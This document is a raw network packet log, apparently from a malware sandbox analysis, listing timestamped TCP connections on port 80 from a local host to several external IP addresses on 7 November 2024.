                                                                                                                            Nov 7, 2024 10:51:17.562177896 CET4917980192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:17.573620081 CET4917980192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:17.578560114 CET8049179104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:17.578603983 CET4917980192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:17.578630924 CET8049179104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:17.583616972 CET8049179104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:19.081655979 CET4917980192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:19.086788893 CET8049179104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:19.088287115 CET4917980192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:20.107064009 CET4918080192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:20.112356901 CET8049180104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:20.112422943 CET4918080192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:20.123925924 CET4918080192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:20.128951073 CET8049180104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:21.305032969 CET8049180104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:21.305087090 CET8049180104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:21.305164099 CET4918080192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:21.500977039 CET8049180104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:21.500998020 CET8049180104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:21.501080990 CET4918080192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:21.624325037 CET4918080192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:22.642225027 CET4918180192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:22.649116039 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:22.654232979 CET4918180192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:22.664246082 CET4918180192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:22.669262886 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:22.669313908 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:22.672544956 CET4918180192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:22.677514076 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:22.677939892 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:23.811223030 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:23.811250925 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:23.811305046 CET4918180192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:24.004609108 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:24.004646063 CET8049181104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:24.004736900 CET4918180192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:24.167176962 CET4918180192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:25.186222076 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:25.191214085 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:25.194222927 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:25.199760914 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:25.205660105 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.416253090 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.416285038 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.416296005 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.416306973 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.416321039 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.416495085 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.416495085 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.598679066 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.598691940 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.598717928 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.598731041 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.598742008 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.598860025 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.598860025 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.599497080 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.599509001 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.599519968 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.600366116 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.600393057 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.794981956 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.795032978 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.795044899 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.795147896 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.796000004 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.796013117 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.796025038 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.796047926 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.796072006 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.796083927 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.796113014 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.796314001 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.797004938 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.797050953 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.797064066 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.797758102 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:26.797796965 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.799680948 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.800965071 CET4918280192.168.2.22104.21.14.183
                                                                                                                            Nov 7, 2024 10:51:26.805944920 CET8049182104.21.14.183192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:31.875118971 CET4918380192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:31.879913092 CET804918367.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:31.879970074 CET4918380192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:31.891536951 CET4918380192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:31.896476984 CET804918367.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:31.896534920 CET4918380192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:31.896558046 CET804918367.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:31.901431084 CET804918367.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:32.590548992 CET804918367.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:32.629900932 CET804918367.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:32.634254932 CET4918380192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:33.402180910 CET4918380192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:34.419231892 CET4918480192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:34.424077034 CET804918467.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:34.430273056 CET4918480192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:34.438261986 CET4918480192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:34.443447113 CET804918467.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:35.119466066 CET804918467.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:35.157016039 CET804918467.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:35.162420988 CET4918480192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:35.945091009 CET4918480192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:36.962676048 CET4918580192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:36.967653036 CET804918567.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:36.969332933 CET4918580192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:36.981237888 CET4918580192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:36.986485004 CET804918567.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:36.986656904 CET804918567.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:36.986751080 CET4918580192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:36.992022038 CET804918567.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:36.992136955 CET804918567.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:37.652642012 CET804918567.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:37.693622112 CET804918567.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:37.693671942 CET4918580192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:38.487833023 CET4918580192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:39.507966995 CET4918680192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:39.512912989 CET804918667.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:39.513008118 CET4918680192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:39.523251057 CET4918680192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:39.528162003 CET804918667.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:40.436044931 CET804918667.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:40.474265099 CET804918667.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:40.474759102 CET4918680192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:40.475359917 CET4918680192.168.2.2267.223.117.142
                                                                                                                            Nov 7, 2024 10:51:40.480173111 CET804918667.223.117.142192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:45.494755983 CET4918780192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:45.499875069 CET80491873.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:45.499932051 CET4918780192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:45.511606932 CET4918780192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:45.516444921 CET80491873.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:45.516490936 CET4918780192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:45.516582966 CET80491873.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:45.521248102 CET80491873.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:46.130137920 CET80491873.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:46.130202055 CET4918780192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:47.021668911 CET4918780192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:47.027374029 CET80491873.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:48.039518118 CET4918880192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:48.046144009 CET80491883.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:48.046195984 CET4918880192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:48.057593107 CET4918880192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:48.064239979 CET80491883.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:48.692841053 CET80491883.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:48.696415901 CET4918880192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:49.563853025 CET4918880192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:49.568639994 CET80491883.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:50.581418037 CET4918980192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:50.586266041 CET80491893.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:50.593571901 CET4918980192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:50.600756884 CET4918980192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:50.605954885 CET80491893.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:50.606170893 CET80491893.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:50.606282949 CET4918980192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:50.611125946 CET80491893.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:50.611354113 CET80491893.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:51.236273050 CET80491893.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:51.238399029 CET4918980192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:52.106858015 CET4918980192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:52.117686033 CET80491893.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:53.124036074 CET4919080192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:53.128978014 CET80491903.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:53.129220963 CET4919080192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:53.139329910 CET4919080192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:53.144336939 CET80491903.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:53.785733938 CET80491903.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:53.786154032 CET80491903.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:53.786205053 CET4919080192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:53.790009022 CET4919080192.168.2.223.33.130.190
                                                                                                                            Nov 7, 2024 10:51:53.795186996 CET80491903.33.130.190192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:59.030992031 CET4919180192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:51:59.035902977 CET8049191113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:59.035969973 CET4919180192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:51:59.047612906 CET4919180192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:51:59.052519083 CET8049191113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:59.052722931 CET4919180192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:51:59.052865028 CET8049191113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:51:59.057547092 CET8049191113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:00.149920940 CET8049191113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:00.360078096 CET8049191113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:00.360322952 CET4919180192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:00.391833067 CET8049191113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:00.392165899 CET4919180192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:00.546580076 CET4919180192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:01.563757896 CET4919280192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:01.569653988 CET8049192113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:01.569758892 CET4919280192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:01.581459045 CET4919280192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:01.586364031 CET8049192113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:02.651232004 CET8049192113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:02.859292984 CET8049192113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:02.862447977 CET4919280192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:02.892071962 CET8049192113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:02.894648075 CET4919280192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:03.089287043 CET4919280192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:04.107367039 CET4919380192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:04.112221003 CET8049193113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:04.112287998 CET4919380192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:04.123946905 CET4919380192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:04.128798008 CET8049193113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:04.128829002 CET8049193113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:04.128865957 CET4919380192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:04.133716106 CET8049193113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:04.133791924 CET8049193113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:05.191865921 CET8049193113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:05.403481960 CET8049193113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:05.403554916 CET4919380192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:05.431339979 CET8049193113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:05.431482077 CET4919380192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:05.632502079 CET4919380192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:06.649332047 CET4919480192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:06.654195070 CET8049194113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:06.654334068 CET4919480192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:06.662502050 CET4919480192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:06.667376995 CET8049194113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:07.720448971 CET8049194113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:07.930169106 CET4919480192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:07.931379080 CET8049194113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:07.931433916 CET4919480192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:07.962096930 CET8049194113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:07.962196112 CET4919480192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:07.963056087 CET4919480192.168.2.22113.20.119.31
                                                                                                                            Nov 7, 2024 10:52:07.967802048 CET8049194113.20.119.31192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:13.187724113 CET4919580192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:13.192563057 CET804919547.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:13.192758083 CET4919580192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:13.204430103 CET4919580192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:13.209424019 CET804919547.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:13.209435940 CET804919547.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:13.209633112 CET4919580192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:13.214626074 CET804919547.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:14.197551012 CET804919547.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:14.401031971 CET804919547.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:14.401099920 CET4919580192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:14.711177111 CET4919580192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:15.772641897 CET4919680192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:15.778094053 CET804919647.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:15.778179884 CET4919680192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:15.783904076 CET804919647.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:15.783987999 CET4919680192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:15.818451881 CET4919680192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:15.823373079 CET804919647.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:18.349376917 CET4919780192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:18.423888922 CET804919747.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:18.423964977 CET4919780192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:18.437149048 CET4919780192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:18.440535069 CET804919747.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:18.440596104 CET4919780192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:18.442090034 CET804919747.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:18.442136049 CET804919747.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:18.446122885 CET804919747.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:20.954834938 CET4919880192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:20.960213900 CET804919847.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:20.960263014 CET4919880192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:20.968383074 CET4919880192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:20.973227978 CET804919847.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:21.975764036 CET804919847.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:22.182132006 CET804919847.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:22.182248116 CET4919880192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:22.186388969 CET4919880192.168.2.2247.129.103.185
                                                                                                                            Nov 7, 2024 10:52:22.191351891 CET804919847.129.103.185192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:27.328052998 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:27.967156887 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:27.967226982 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.047858953 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.053224087 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.053275108 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.053597927 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.058213949 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.632575989 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.632700920 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.632765055 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.632816076 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.632827044 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.632873058 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.632898092 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.632973909 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.632982969 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.633060932 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.633114100 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.633136034 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.633188009 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.633440971 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.637890100 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.637926102 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.637943983 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.638484001 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.638520002 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.639244080 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.667908907 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.667963028 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.668735027 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750200987 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750267982 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.750277996 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750293016 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750377893 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.750472069 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750485897 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750498056 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750534058 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.750776052 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750787020 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750823975 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.750930071 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750941038 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.750983953 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.751120090 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.751132965 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.751168013 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:28.751347065 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:28.969571114 CET4919980192.168.2.2238.47.237.27
                                                                                                                            Nov 7, 2024 10:52:29.012590885 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.012695074 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.012706041 CET804919938.47.237.27192.168.2.22
                                                                                                                            Nov 7, 2024 10:52:29.012851000 CET4919980192.168.2.2238.47.237.27
